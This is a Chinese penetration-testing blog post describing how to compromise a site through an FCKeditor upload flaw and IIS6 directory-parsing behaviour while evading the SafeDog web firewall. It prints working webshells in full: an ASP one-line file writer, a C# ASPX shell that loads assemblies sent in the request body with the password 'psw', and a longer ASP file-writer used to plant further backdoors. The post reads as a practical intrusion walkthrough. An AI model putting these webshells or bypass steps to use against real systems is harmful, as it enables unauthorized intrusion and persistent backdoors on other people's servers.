您的位置 » 首页 » 渗透测试 » 从Fck漏洞的绕过谈突破安全狗经验

从Fck漏洞的绕过谈突破安全狗经验

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年11月08日 | 文章热度:9,196 次 全屏阅读

显示不全请点击全屏阅读

FCKeditor的browser被删了,但是connector和测试页面都在,那就没问题了。
准备一个图片马,命名为a.asp;.gif然后上传,FCK自动重命名为a_asp;.gif,遇到这种情况,同一个文件再传一遍,文件就自动重命名为a.asp;(1).gif。
但是访问:

view source1 http://91ri.org/ YourUploadFilePath/file/a.asp;(1).gif

却弹出提示:

您的请求带有不合法的参数,谢谢合作!
来自安全狗互联网安全实验室-网站安全狗软件的友好提示,了解更多请点击

不过看到朋友已经把.asp文件夹建好了。直接传个图片到/shell.asp/这个文件夹,利用iis6的解析漏洞,就可以解析成asp了,而且绕过了安全狗。
不过知道好多马儿都上不去,菜刀一句话也403没辙。干脆就用别的了。建立shell.asp畸形文件夹的办法可以参考:《解决Fckeditor删除所有上传页面如何上传入侵》

view source1 <%If request(“cmd”)<>”” And request(“path”)<>”” then Createobject(“Scri”&”pting.FileSys”&”temObject”).CreateTextFile(server.mappath(request(“path”))).WriteLine request(“cmd”)%>

这是上传文件的一句话服务端,这个一句话可以用习科开发的asp上传类一句话ShellClient连接并上传文件。点此下载:shellclient
除了这个工具,“ASPX一句话shell客户端”这个工具也可以完美的绕过安全狗。

这个aspx的服务端是:

view source1 <%@ Page Language=”C#” ValidateRequest=”false” %> 

2 <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“psw”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

密码是psw,但是现在上传后门是在/shell.asp/这个目录,如果命名aspx是500不解析的。如果加分号,对aspx也是没用的。
在“新后门”那里如果写xxx.asp,xxx.asa,xxx.cer都没问题,但是上传../xxx.aspx这样的把目录转出去到/shell.asp/文件夹外面的话就失败了
想想怎么把aspx的后门写到/shell.asp/目录外面。用了个小马:

view source01 <% 

02 dim objFSO 

03 dim fdata 

04 dim objCountFile 

05 on error resume next 

06 Set objFSO = Server.CreateObject(“Scripting.FileSystemObject”) 

07 if Trim(request(“systempath”))<>”” then 

08 fdata = request(“sAvedata”) 

09 Set objCountFile=objFSO.CreateTextFile(request(“systempath”),True) 

10 objCountFile.Write fdata 

11 if err =0 then 

12 response.write “<font color=red>保存成功!</font>”

13 else 

14 response.write “<font color=red>保存失败!</font>”

15 end if 

16 err.clear 

17 end if 

18 objCountFile.Close 

19 Set objCountFile=Nothing

20 Set objFSO = Nothing

21 Response.write “<form action=” method=post>”

22 Response.write “保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>”

23 Response.Write “<input type=text name=systempath width=32 size=50>”

24 Response.Write “<br>”

25 Response.write “本文件绝对路径”

26 Response.write server.mappath(Request.ServerVariables(“SCRIPT_NAME”)) 

27 Response.write “<br>”

28 Response.write “输入马的内容:”

29 Response.write “<textarea name=sAvedata cols=80 rows=10 width=32></textarea>”

30 Response.write “<input type=submit value=保存>”

31 Response.write “</form>”

32 %>

这样就把aspx的马写到外面了
asp上传大马会提示危险参数禁止上传,但是用这个aspx就没问题了。只需要cmd拷贝一下就可以了。asp的大马轻松运行无压力。
这个站我真的没有被安全狗难倒,秒杀。有些东西只是纸老虎而已

91ri.org:很多人说安全狗是款很垃圾的产品,其实不能说它不好 首先一款可以免费给大家用的东西可以证明至少它的出发点是好的 共享精神是好的。 其次它确实拦截了不少脚本小子们的攻击行为。 但是安全狗公司在处理漏洞被发现这件事情上真的也确实让我们不满意,人开发的就会有漏洞 被绕过也不是什么难为情的事情,多跟谷歌那些公司学习 一款产品的进步不是去封杀它存在的问题 而是改进改进在改进!

原文:http://bbs.blackbap.org/thread-3324-1-1.html

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理

Tags:

绕过安全狗,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1610/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)